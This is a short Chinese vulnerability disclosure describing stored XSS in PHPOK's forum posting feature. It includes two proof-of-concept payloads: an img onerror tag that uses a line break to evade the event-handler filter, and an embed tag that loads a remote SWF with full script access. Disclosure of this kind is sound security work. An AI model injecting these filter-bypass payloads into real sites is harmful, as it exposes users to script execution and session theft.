phpok 最新版储存型xss。

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: rt ### 详细说明: 看到出了论坛这个新功能 xss过滤还是不够哦。 两处问题。 发布帖子处, #1 正则貌似有问题。 ``` <img src=x onerror =alert(1)> ``` 换行就绕过了对 onxxx的检测。 [<img src="https://images.seebug.org/upload/201501/10171122a45577cced3245ab2cf6fd4ba2da2e91.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171122a45577cced3245ab2cf6fd4ba2da2e91.jpg) [<img src="https://images.seebug.org/upload/201501/10171131e31a44e87748449b749486886f3e5697.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171131e31a44e87748449b749486886f3e5697.png) #2 <embed> 测试代码 ``` <embed src="http://cm2.in/xss.swf" allownetworking="all" allowscriptaccess="always"> ``` [<img src="https://images.seebug.org/upload/201501/101712293924adbbe4f21061ea6a4b24efdb50fe.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101712293924adbbe4f21061ea6a4b24efdb50fe.png) ### 漏洞证明: [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息